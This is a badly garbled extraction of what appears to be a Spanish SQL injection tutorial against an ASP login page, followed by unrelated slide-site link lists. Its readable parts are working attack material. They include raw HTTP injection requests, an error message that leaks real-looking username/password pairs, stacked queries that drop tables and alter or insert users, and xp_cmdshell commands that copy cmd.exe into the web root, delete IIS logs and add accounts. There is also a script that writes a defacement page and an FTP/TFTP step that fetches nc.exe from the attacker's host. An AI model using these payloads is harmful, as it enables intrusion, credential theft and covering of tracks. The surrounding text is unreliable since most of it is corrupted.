take a nvarchar data type as an argument. /Login.asp, line 85 - " " 6 9 6 :,-' " " ) " " & 4 6 " " E> ,> " 4 F " " ) 9 " I 8 " 9 " " " " 1:& 6 ( " " & " 6 " " 9 = " , ) 9 " " " " " ) ) ( & "= & + )
2 " " 6 "& " ) * " ( " " #$% ) " " ) " E! " " " )4 6 #$%KK& IIF 8 "& " " " " " " & " " " " " " #$% 1 :1& 9 4 " # + " " " & " ) ) " ( & ; !: ,8 ,5;: 9 " " " 9 " . " " ! " " . & 9 " 9 " " " + I :M& < ' " 5 + " < =" >5 6 #$% 4 ` a>& #$% ># > 6 * & 6 " " & #$% " < * " " 4 " 9 " " " " " " " " " " 4 " * 9 " 4 " + > ,> 8" " 4 " 4 6 9 " " 1H5 ' 5 EA " " " " F " 6 #$% " " >9 4 > 7 " 9 . # 1H5 ' 5 - & . " " 6 " 6 7 " . " " " + " " "& " . ) ) " " #$% ! . * & )" 6 " 9 " 6 1 &( ! (! # 5 :# 4 # # " " " # )!% #, " " " . " , " " " ! ) ! * " " " ! * M " " " ! * " " " " ! <# " " " " ! <1 " " " ! M " " " % " # " " " " , " " " , M " " , E1 ) " F " " # " " !G# E' " D F 8 ' 6 & " * * " ( " ) "& " " + " " "& . " " " 6 " < " ! & " > . " D > > . > " E! .J F 9 " & " " "& " " ) " 9 " . " " " ) " ) " " " " ) "& + " " " 6 " " > >& 9 ;:,5 * * 6 " )4 6 & b 1;5 >86 "& , " ) + 8 > . " " " " 4 . " , & " & E% " 9 ) 9 F . . 9 " + " "
2 4; ! * #! ! !< !& ! (! 6 ( #$%& ( " " " . " * ) " " )4 6 & ( . " " 7 " 9 " ) " = (! , 8 .= # . "& >) " > ) " " " . & " " 9 6 ) " " " A=4 " 9 * . " ) * * 4 . " " "" ) " " 6 & ( 7 " " " " > $6 3 / (! 6#; ! % " " " & " ( * #$% . ) " 6 " 1;: 9 " . " . " E% 9 " * 6 " 6 " ( F * * " 6 " " " , + !G# H 6 " " " F + 6 " * 9 ) = 6 !:#; + POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 199 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27+declare+@aux+varchar%288000%29+set+@aux%3D %27%27+select+@aux%3D@aux+%2B+UID%2B%27/%27%2BPWS%2B%27%3 B%27+from+usuarios+where+UID%3E@aux+select+@aux+as+aux+in to+xtmp--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y
2 H + L < 6 EB F " <VLL " <V <[ [L L[ "[L]L* " " U < " < " < < W -> $6 3 , 8 . ! (! 6#; ! 6 ( " " & " ) " + #8%8'; ) ( 7 " " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 76 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Ups%27union+select+aux%2C1%2C1%2C1+from+xtmp-- &txtPassword=Angel Y Y H 9 6 " Y >! "" > * Y . " Y H + "L " <& & & * < 00 ) ( " !:#; * & 6 :,-' 6 6 " " ) " 4 " * . ) " . * * " " " Login de Usuarios Registrados Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'Danyr2/pepe;THEMA/M1703;CIELORIANO/daniel;ALELARRAINP/14 05;SANDRA/4484188;0001/13119695;AsdrubalCh/1173;beatrizay ala/10338154;maria_perez/12345;batv/peresosita;susy/susyk a;Mireya_Salazar/gabriela;MVidales/male;AngelicaS/chainy;
22 carla/cardie;MonicaA/amorcito;aliciafalcon/baby;dayana/ne ne;Luz_d/carmen;mguevara/martha;Tiatere1/lima27;CMorena/2 11095;victor... /Login.asp, line 85 2> $6 3 4! & ! (! 6#; ! 6 ( ) " " " ) " "& ) ( " & " . + , :!& " " " . 4 POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 53 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27%3Bdrop+table+xtmp--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * . " Y H + L] ) < 00 - 6! ! ; " " " " " " " " . & " " " " 6 " " " . 6 ) " " " " "& "& 9 ( 6 " 9 . * & " " 5 " " " " " ) " " 9 " * & . . . " " " ) " " $+6 4 H " 4 9 " " " !:#; ( "" " . " " 6= + " !,5;8
23 POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 103 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27%3Bupdate+usuarios+set+pws%3D%27NuevoPass%2 7+where+uid%3D%27Carla%27--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y H + L " " " "VL1 6 ! ""L VL' L00 +4 4 4 # & . " * " !:#; & . " + 9 E5 9 " * 9 " " #$% # 6 F . " H + 'delete from usuarios where UID='Usuario'-- 1 4 $ " 1#8 ;& ) " 9 " " 4 & " " 9 & " " " "& " " 6 " 6 " " " " 9 + . " " " ! & " " ) ( . & + 4 " & . " E' " 4 KKKF " = " ) " . 9 = 9 " " ( " 7 & 6 " " " "& + . ( 9 " " " )
2? 5"= " & " 9 < " " " " 1#8 ; " " 9 " ) " & 4 * " + & " . = 9 " " " " ( " !:#; 6= :)6 7< " + . * 9 " + . & " ) " " " " + " " " 6 " " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 113 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27%3Binsert+into+usuarios+values+%28%27MyUser %27%2C%27MyPassword%27%29--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y H + L] " " " 6 " EL + " L&L +! "" LF00 % & & ! ! " . " . " ! " ) ( . " 7 " " " #$% 4 " " ( " " " " * " * & ) " 6 " II * 6 1: " " . & " " * " 9 " * #$% # 6 " >8< # ! "> " < " $ # ?4; $ # % " " < " " " & ,%%L" 9 < " " ) " " " " & " " " " 8< " " " " < "& 6 " #0#$%& " " ) * " 5 . " "& #0#$% ) " ) .
2@ " " " < " "& " " & * " ) ) " " " 9 " 5 ) " * " "& " " " " " " " " " " " 9 " + " ( " " " < Q " N Q " " 4 " " " 6 6= #$% > " > " K 6 " ( = " " " " . " 4 " " ;;! POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 90 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Ups%27%3BEXEC+master.dbo.xp_cmdshell%27cmd.exe +dir+c%3A%27--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y H + "L]8N8' " ) < Q " L < L00 :M ) " " " + * ) 9 " 4 & " ) 4 " #5 E 6 " " " ) " ( < Q " F , " * " " )" 6 " " " = " ) " * " 6 > > . 9 " ) " * . " 6 " E8 " " & & & " & F 5 4 & 6 " . " " * " 9 " " = 6 " " < Q " E/ " 1 ) 4 " ) " " = "F
2 ! " EXEC master..xp_cmdshell 'dir c:inetpubwwwroot' ! 6 9 6 EXEC master..xp_cmdshell 'type c:inetpubwwwrootalguna_pagina.asp' ! " ) EXEC master..xp_cmdshell 'copy c:winntsystem32cmd.exe c:inetpubwwwrootchroot.exe' ! ) " EXEC master..xp_cmdshell 'DIR c:winntsystem32logfilesw3svc1' EXEC master..xp_cmdshell 'NET STOP "Servicio de publicación en World Wide Web"' EXEC master..xp_cmdshell 'del c:winntsystem32logfilesw3svc1 filelog.log' EXEC master..xp_cmdshell 'NET START "Servicio de publicación en World Wide Web"' ! 6 " EXEC master..xp_cmdshell 'NET SHARE nombre=drive:path' ! " 6 G " EXEC master..xp_cmdshell 'NET USER username password' :M& " ) . " " >8< # ! ">& " . " " " " >1 8< ">& " " ) 7 ) " & 4 " " " " " # " + " 'exec master..sp_addlogin MyUser, MyPass 9 " . " " ) 6 & " " ; " * & . . " " ) " 9 " ) & " " " " " ># ! "> + >8< # ! "> 9 ) = " " ) " " " " ! " " " " " & " * " + = #0#$% # 6 " * " " " " + " " " 6 " * "
2B " Q " Q " Q " + " Q * . " Q " 6 ) " Q . < Q ) "M < Q . < Q . < Q . M + < Q . 6 < Q" 6 < Q " < Q < Q 6 . - $ % + ) % " & * " & " " " + " " ) " " " + 7 " . " " #$% 4 & * + " ' " ) 4 ) " " & 4 " " 9 * ( " " " ( 4 " > * > % " 7 "& 9 " ( 67" #$% E$ + +( 9 9 " < ) " " #$% 6= :,-'F& " 9 " " #5& " ) " " 322& ) " . * 9 " # ) & " . " + " #$%& . " . - " " & 9 4 * " 1 & " . " > . (( # + ; >& " M <& < " " 7 " 6 " H " . " * . " ----- Extracto ------------------------------------------ [...] La idea es crear una pagina html o asp, si en el sitio objetivo se encuentra activo y funciónando un webserver [...] declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:web-hostingattajdidindex3.html', 1 exec @ret=sp_oamethod @f, 'writeline', NULL, '<HTML> <HEAD><TITLE>Hola Mundo!!!</TITLE> </HEAD> <BODY text=black bgColor=#000000> <CENTER> <P><B>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<FONT face=Arial color=#b4b58c size=7>Vosotros </B>Perejil...</B></FONT></P></CENTER> <P><BR><BR>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<!--" "-- ></P> <P></P> <CENTER> <P><B><FONT face=Arial color=#b4b58c size=7>' exec @ret=sp_oamethod @f, 'writeline', NULL, 'nosotros vuestras </B>WEB<B>s!!!</B></FONT></P></CENTER> <P><BR><BR></P>'
2C exec @ret=sp_oamethod @f, 'writeline', NULL, '<DIV align=center> <CENTER> <TABLE cellSpacing=0 cellPadding=0 width=100 border=0>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<TBODY> <TR> <TD bgColor=#d20000>&nbsp;</TD></TR> <TR> <TD align=middle bgColor=#ffff00>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<FONT color=#ffff00 size=1>¡ORTO!<BR>¡¡¡Va por vosotros!!! </FONT></TD></TR> <TR> <TD ' exec @ret=sp_oamethod @f, 'writeline', NULL, 'bgColor=#d20000>&nbsp ;</TD></TR><!--" "-- ></TBODY></TABLE></CENTER></DIV> ' exec @ret=sp_oamethod @f, 'writeline', NULL, '<P><BR><BR><BR><BR><BR></P>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<P align=right> <FONT face="Courier New" color=#00ff00 size=5> lagear & runlevel</FONT></P>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<P align=right> <FONT face="Courier New" color=#00ff00 size=4>Recuerdos a <B>N</B>9<B>Team</B></FONT>' exec @ret=sp_oamethod @f, 'writeline', NULL, '</P> <P align=right> <FONT face="Courier New" color=#00ff00 size=3>' exec @ret=sp_oamethod @f, 'writeline', NULL, 'Donde te podemos encontrar BreakICE?</FONT></P> <FONT color=black>" </FONT> </BODY></HTML>' Para subir archivos.- Creamos un archivo get.txt para utilizar luego ftp declare @o int, @f int, @t int, @ret int EXECUTE sp_oacreate 'scripting.filesystemobject', @o out EXECUTE sp_oamethod @o, 'createtextfile', @f out, 'c:get.txt', 1 EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'user anonymous' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'get nc.exe' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'quit' EXECUTE master.xp_cmdshell 'FTP -s c:get.txt NUESTROHOST' o algo mas fácil si tenemos un tftp en nuestro host EXECUTE master.xp_cmdshell 'TFTP -i NUESTROHOST GET c:mi_local_file c:remote_file'
3 ----- Extracto ------------------------------------------ :M& ) & ) " " ( " * " " )4 " . " " " 6 " " #0#$% # 6 & 6 " *=" " 9 " ) " . " " " 8 " " & " " Q + " Q 9 " " . " )4 :%8 " " * #$% # 6 E " 4 " . * "+" )4 F + " 7 " " " . )4 6 " ) " ; " Q . & c " & )4 M : ;! ; ` & < a ; " Q )4 M & ` & 6 : ;! ; a ` & ` V a ` : ;! ; a ` a a " 3 , + # ) " " " & 9 #0#$% " ) " " 9 " 7" " " "& ) 9 " . " " & " * " & 9 ) 4 .J 6 " " J " " ) " 7 " #$% 4 ! " 9 " D " + #$% 9 6 " ) " " " ) < " 6 & + = " ) " " " " ( " E: ) = " "IF & " + * " " " ) * " 6 " . & " " #$% + " 5 ) " * . >; : G ) 5 # + ! 4 > " " 7 . " " ) " " #$% 4 + " ) " " " " " 0 * # L 1;: : ;A %8L ' > > % + = " " + ) = " " J " " "
3 0 3 ! # )" " " ) " 1 :1 " ) H " " " E *Q* KF 1 " J " " " 0 +,- # )" " " ) " 1 :1 " ) ! " 5 " 1 " J " " " 0 $ . # ':!S E8 " " F # )" " " ) " 1 :1 " ) ! " 5 " J " " " " " ) "K 0 # )" " " ) " 1 :1 " ) ! " 5 " J " " " " " ) "K " " " " " " " * E< Q " & " Q " F "@ % & A . & 6 " . * % " " " 9 " " " * " ( ". * & " " 6 ) " " #0#$% " 7 " 4 " " ' " " & " " & " " . " . "& " " " " " ) ) ) " . 7 . " ( 6 # 6 ! M " " 6 " " 9 " " 6 7 . " ( " J " " " " 6 " " 9 " " 6 ! 4 *=" " " " 6 " ) " " 8" ) ( ! = ' ( A " 6= # * * " " < " " = " 8" + " ;'! 322 + ,! 323F 1 " " 6 " ) " " 6 ) " " 1 " " = & " 6 #$% " 6 " "
3 ! " " " . " . * . E, " 6 " ) " " " " . ( & M" ) * . F H * 9 6 " " " " " #0#$% # 6 8" ) ( " 6 . " "& " ) " " 9 ( " " " " 8" ) ( 6 " " . 6 " * " * E " " " . ) 0 " " " * ( " M " " MF 8" ) ( "" * #5 # " 9 " . & " " " * " . " 6 #0#$% 6 ' 1 4 ) ) " " 6 " " " " " " . " ( " . " H 6 ) " " ) " " ' 9 " " " " " " " " " >$ > " " " 9 " " . ) " " "A % B ! #0#$% # 6 " " & + " " ) " 7 " + 6 " " 6 " . " . " " " * " " " " . & 9 9 " ) " " " " " ) + + " ( " . 6 ( " " " " ) 4 " " " " " 6 " " " . ' " * & " " 9 . " 6 " " " 6 & < " " ) " " " " . + " " " " 9 + = " " " 6 " ) " & " ) < 7< " + " " 7 " M . " ) #0#$% # 6 8 " " " . "& " " + "* ( " " A " "& " " + # 6 " ! M" = & * . " " " 6 " ) " "& " . * " * 6 " " . G " & " ) " " 6 " " "& " " " " ) > .= " ) " . " . > + " " " " ) " " . & ) = 6 " #$% 4 . *= 4 # ) * " " & 74 " 6 " " * M . * " G " 8 " & " " " * "& " " " " " + " " " . * ) = " . " " " " 6 ) " 6 " E; " " #0#$%F 8" ) " " " " 9 " . " D " " . * ) " . ( # #;8 5 G "
32 ' 6 G " 2& + " " " ) " 9 " " " " ) " " " . E5 ( " 5 "& , 6 " # . & 8A#& F "= ) 7 %81;: " * " ( " " " " * & " " 9 " . ) " " #0 #& #0#$%& # " " 8 !& " " ) ( " * & " . & + 9 #:- 8 " " 6 5 " " 9 + "* " + 9 " ) " " " " " + " 6 " " & " " " 7 " 5 " 6 " . " " 7 " #$% 4 & 6 9 6 " " > * " + % " ' "> " " 9 " < 6 # " "& + " " < 5 " >5 . ! > "C ) * # % & ! & - M > M . 8< " G " > E #-1 B303B 022CB0@F " M . M " Q QG " "9 "9 Q 3 "9 " + " * "9 6 6 " + " " + " " #$% 4 G ! * " " " .Q#$%Q# 6 Q " .Q#$%Q 4 * < . "" " 6 Q"9 Q 4 * < . "" " Q 6 Q"9 Q 4 * < . "" " 0#$% * < . "" " M .0"9 0 "" " * < . "" " 6 .Q ) " Q" + * " " + 6 " ?,! 1 ! @8 " . " Q6 "9 " "D ! M < M " " + * " M M M " " + . ' M " #9 )* (
33 M " " + . 1; " " #9 M ( M " " + . G "9 < M " " + . G "9 . ( M " " + + . ) 5 "0 0 @0) ( << " " " " * " " " M " " MQJ " + " ; " " B % ! ( 01 ( , :! " 9 " " )+ 1 0 " . II )+ 5 . 0' ' % . " " F )+ 6 0S " * " ) " " " ) "I )+ 5 . 59 = 6. & ** " * . & " " 9 " " = " * " " 6 = " " " " " " ( . 6 . (( # + ; & " . " > > < 1 ) 9 " * " 9 = = & + 9 " ) " " "& " * 9 . " " + 9 " < " ) " " " " " " ) " " ) 8 " . . & . ( " " " 6 " " " " D " 1 + 6 9 " "* ( " " " * . 9 " " ") ( " " " " * " ; ) 7 . " = + # 9 " " " " " #0#$%& . " " " " . / " 9 " 9 67" " " " " " + * " " " #$% 4 E8" . O1 < / # + # * % d " " " J "KF ! & . " " 9 " . " " " " " " " . * & < " 9 D 5 " >5 . ! >

Recomendados

(Guia para elaborar,_estrutura
(Guia para elaborar,_estrutura(Guia para elaborar,_estrutura
(Guia para elaborar,_estruturaKátia Amaral
 
60141653 su-hai-long-khach-hang
60141653 su-hai-long-khach-hang60141653 su-hai-long-khach-hang
60141653 su-hai-long-khach-hangThanh Hang
 
Libro deapoyometminjaresme
Libro deapoyometminjaresmeLibro deapoyometminjaresme
Libro deapoyometminjaresmeadriana barba
 
Ricardo%20 gondim%20 %20soli%20deo%20gloria
Ricardo%20 gondim%20 %20soli%20deo%20gloriaRicardo%20 gondim%20 %20soli%20deo%20gloria
Ricardo%20 gondim%20 %20soli%20deo%20gloriaDorival Leandro
 
Curso de guitarrra
Curso de guitarrraCurso de guitarrra
Curso de guitarrraThalles Anderson
 
بهینه سازی استفاده از آنزیمهای پروتئاز...
بهینه سازی استفاده از آنزیمهای پروتئاز...بهینه سازی استفاده از آنزیمهای پروتئاز...
بهینه سازی استفاده از آنزیمهای پروتئاز...Haleh Hadaegh
 
Vật liệu cơ khí phạm đình tân, 137 trang
Vật liệu cơ khí phạm đình tân, 137 trangVật liệu cơ khí phạm đình tân, 137 trang
Vật liệu cơ khí phạm đình tân, 137 trangjb00007
 
The Colbert Report. La satire politique qui réveille l'Amérique
The Colbert Report. La satire politique qui réveille l'AmériqueThe Colbert Report. La satire politique qui réveille l'Amérique
The Colbert Report. La satire politique qui réveille l'AmériqueAntoine Patricot
 

Recomendados

(Guia para elaborar,_estrutura
(Guia para elaborar,_estrutura(Guia para elaborar,_estrutura
(Guia para elaborar,_estruturaKátia Amaral
 
60141653 su-hai-long-khach-hang
60141653 su-hai-long-khach-hang60141653 su-hai-long-khach-hang
60141653 su-hai-long-khach-hangThanh Hang
 
Libro deapoyometminjaresme
Libro deapoyometminjaresmeLibro deapoyometminjaresme
Libro deapoyometminjaresmeadriana barba
 
Ricardo%20 gondim%20 %20soli%20deo%20gloria
Ricardo%20 gondim%20 %20soli%20deo%20gloriaRicardo%20 gondim%20 %20soli%20deo%20gloria
Ricardo%20 gondim%20 %20soli%20deo%20gloriaDorival Leandro
 
Curso de guitarrra
Curso de guitarrraCurso de guitarrra
Curso de guitarrraThalles Anderson
 
بهینه سازی استفاده از آنزیمهای پروتئاز...
بهینه سازی استفاده از آنزیمهای پروتئاز...بهینه سازی استفاده از آنزیمهای پروتئاز...
بهینه سازی استفاده از آنزیمهای پروتئاز...Haleh Hadaegh
 
Vật liệu cơ khí phạm đình tân, 137 trang
Vật liệu cơ khí phạm đình tân, 137 trangVật liệu cơ khí phạm đình tân, 137 trang
Vật liệu cơ khí phạm đình tân, 137 trangjb00007
 
The Colbert Report. La satire politique qui réveille l'Amérique
The Colbert Report. La satire politique qui réveille l'AmériqueThe Colbert Report. La satire politique qui réveille l'Amérique
The Colbert Report. La satire politique qui réveille l'AmériqueAntoine Patricot
 
Notes hadeeth
Notes hadeethNotes hadeeth
Notes hadeethLight Upon Light
 
Gsp53 1
Gsp53 1Gsp53 1
Gsp53 1ครูสุชาติ ขุนฤทธิ์เอียด
 
2.ideal familybyabdurrazzaq
2.ideal familybyabdurrazzaq2.ideal familybyabdurrazzaq
2.ideal familybyabdurrazzaqrasikulindia
 
Ideal family by abdur razzaq
Ideal family by abdur razzaqIdeal family by abdur razzaq
Ideal family by abdur razzaqSelf
 
Ahmad_Raza
Ahmad_RazaAhmad_Raza
Ahmad_RazaAhmad Raza
 
Slownik
SlownikSlownik
SlownikMarcin Polak
 
The Case For Pharmacists As Legal Healthcare Providers
The Case For Pharmacists As Legal Healthcare ProvidersThe Case For Pharmacists As Legal Healthcare Providers
The Case For Pharmacists As Legal Healthcare ProvidersErin L. Albert
 
بررسي تحليلي و تاريخي فعل هاي پيشوندي در زبان فارسي
بررسي تحليلي و تاريخي فعل هاي پيشوندي در زبان فارسيبررسي تحليلي و تاريخي فعل هاي پيشوندي در زبان فارسي
بررسي تحليلي و تاريخي فعل هاي پيشوندي در زبان فارسيomidd
 
2017 investors day_v21.4_toq4_compressed
2017 investors day_v21.4_toq4_compressed2017 investors day_v21.4_toq4_compressed
2017 investors day_v21.4_toq4_compressedRockwellAutomationIR
 
Investor2017 show final_v3_rainvestors_compressed
Investor2017 show final_v3_rainvestors_compressedInvestor2017 show final_v3_rainvestors_compressed
Investor2017 show final_v3_rainvestors_compressedRockwellAutomationIR
 
Optimisation tnc1
Optimisation tnc1Optimisation tnc1
Optimisation tnc1bdsea89
 
Small business workshop
Small business workshopSmall business workshop
Small business workshopJenny Williams
 
J.w.rochester elixir da_longa_vida
J.w.rochester elixir da_longa_vidaJ.w.rochester elixir da_longa_vida
J.w.rochester elixir da_longa_vidaPatrick François Jarwoski
 
Thirukkural
ThirukkuralThirukkural
Thirukkuralsuresh0303
 
Thirukkural.
Thirukkural.Thirukkural.
Thirukkural.kamal kannan
 
Saudi Students Guide to Atlanta
Saudi Students Guide to Atlanta Saudi Students Guide to Atlanta
Saudi Students Guide to Atlanta kmf91
 
Via Respiratoria Unica
Via Respiratoria UnicaVia Respiratoria Unica
Via Respiratoria UnicaDr. Josep Morera Prat
 
perfil de mercado de palta
perfil de mercado de paltaperfil de mercado de palta
perfil de mercado de paltaEliza Ruiz
 
Sorting insertion-sort
Sorting insertion-sortSorting insertion-sort
Sorting insertion-sortFajar Zain
 
Les antigènes de P .Falciparum
Les antigènes de P .FalciparumLes antigènes de P .Falciparum
Les antigènes de P .FalciparumInstitut Pasteur de Madagascar
 
Fusion 06 2003
Fusion 06 2003Fusion 06 2003
Fusion 06 2003rukford1
 
Modul kerajaan-sriwijaya
Modul kerajaan-sriwijayaModul kerajaan-sriwijaya
Modul kerajaan-sriwijayaAyuTamii
 

Mais conteúdo relacionado

Mais procurados

2.ideal familybyabdurrazzaq
2.ideal familybyabdurrazzaq2.ideal familybyabdurrazzaq
2.ideal familybyabdurrazzaqrasikulindia
 
Ideal family by abdur razzaq
Ideal family by abdur razzaqIdeal family by abdur razzaq
Ideal family by abdur razzaqSelf
 
The Case For Pharmacists As Legal Healthcare Providers
The Case For Pharmacists As Legal Healthcare ProvidersThe Case For Pharmacists As Legal Healthcare Providers
The Case For Pharmacists As Legal Healthcare ProvidersErin L. Albert
 
بررسي تحليلي و تاريخي فعل هاي پيشوندي در زبان فارسي
بررسي تحليلي و تاريخي فعل هاي پيشوندي در زبان فارسيبررسي تحليلي و تاريخي فعل هاي پيشوندي در زبان فارسي
بررسي تحليلي و تاريخي فعل هاي پيشوندي در زبان فارسيomidd
 
2017 investors day_v21.4_toq4_compressed
2017 investors day_v21.4_toq4_compressed2017 investors day_v21.4_toq4_compressed
2017 investors day_v21.4_toq4_compressedRockwellAutomationIR
 
Investor2017 show final_v3_rainvestors_compressed
Investor2017 show final_v3_rainvestors_compressedInvestor2017 show final_v3_rainvestors_compressed
Investor2017 show final_v3_rainvestors_compressedRockwellAutomationIR
 
Optimisation tnc1
Optimisation tnc1Optimisation tnc1
Optimisation tnc1bdsea89
 
Small business workshop
Small business workshopSmall business workshop
Small business workshopJenny Williams
 
Saudi Students Guide to Atlanta
Saudi Students Guide to Atlanta Saudi Students Guide to Atlanta
Saudi Students Guide to Atlanta kmf91
 
perfil de mercado de palta
perfil de mercado de paltaperfil de mercado de palta
perfil de mercado de paltaEliza Ruiz
 

Mais procurados (18)

Notes hadeeth
Notes hadeethNotes hadeeth
Notes hadeeth
 
Gsp53 1
Gsp53 1Gsp53 1
Gsp53 1
 
2.ideal familybyabdurrazzaq
2.ideal familybyabdurrazzaq2.ideal familybyabdurrazzaq
2.ideal familybyabdurrazzaq
 
Ideal family by abdur razzaq
Ideal family by abdur razzaqIdeal family by abdur razzaq
Ideal family by abdur razzaq
 
Ahmad_Raza
Ahmad_RazaAhmad_Raza
Ahmad_Raza
 
Slownik
SlownikSlownik
Slownik
 
The Case For Pharmacists As Legal Healthcare Providers
The Case For Pharmacists As Legal Healthcare ProvidersThe Case For Pharmacists As Legal Healthcare Providers
The Case For Pharmacists As Legal Healthcare Providers
 
بررسي تحليلي و تاريخي فعل هاي پيشوندي در زبان فارسي
بررسي تحليلي و تاريخي فعل هاي پيشوندي در زبان فارسيبررسي تحليلي و تاريخي فعل هاي پيشوندي در زبان فارسي
بررسي تحليلي و تاريخي فعل هاي پيشوندي در زبان فارسي
 
2017 investors day_v21.4_toq4_compressed
2017 investors day_v21.4_toq4_compressed2017 investors day_v21.4_toq4_compressed
2017 investors day_v21.4_toq4_compressed
 
Investor2017 show final_v3_rainvestors_compressed
Investor2017 show final_v3_rainvestors_compressedInvestor2017 show final_v3_rainvestors_compressed
Investor2017 show final_v3_rainvestors_compressed
 
Optimisation tnc1
Optimisation tnc1Optimisation tnc1
Optimisation tnc1
 
Small business workshop
Small business workshopSmall business workshop
Small business workshop
 
J.w.rochester elixir da_longa_vida
J.w.rochester elixir da_longa_vidaJ.w.rochester elixir da_longa_vida
J.w.rochester elixir da_longa_vida
 
Thirukkural
ThirukkuralThirukkural
Thirukkural
 
Thirukkural.
Thirukkural.Thirukkural.
Thirukkural.
 
Saudi Students Guide to Atlanta
Saudi Students Guide to Atlanta Saudi Students Guide to Atlanta
Saudi Students Guide to Atlanta
 
Via Respiratoria Unica
Via Respiratoria UnicaVia Respiratoria Unica
Via Respiratoria Unica
 
perfil de mercado de palta
perfil de mercado de paltaperfil de mercado de palta
perfil de mercado de palta
 

Semelhante a Tecnicas de sql injection

Sorting insertion-sort
Sorting insertion-sortSorting insertion-sort
Sorting insertion-sortFajar Zain
 
Fusion 06 2003
Fusion 06 2003Fusion 06 2003
Fusion 06 2003rukford1
 
Modul kerajaan-sriwijaya
Modul kerajaan-sriwijayaModul kerajaan-sriwijaya
Modul kerajaan-sriwijayaAyuTamii
 
Hacia un elearning multisoporte y multicanal: uso de nuevos soportes en los c...
Hacia un elearning multisoporte y multicanal: uso de nuevos soportes en los c...Hacia un elearning multisoporte y multicanal: uso de nuevos soportes en los c...
Hacia un elearning multisoporte y multicanal: uso de nuevos soportes en los c...CRISEL BY AEFOL
 
Euawr workshop brochure
Euawr workshop brochureEuawr workshop brochure
Euawr workshop brochurePtpg Stuc
 
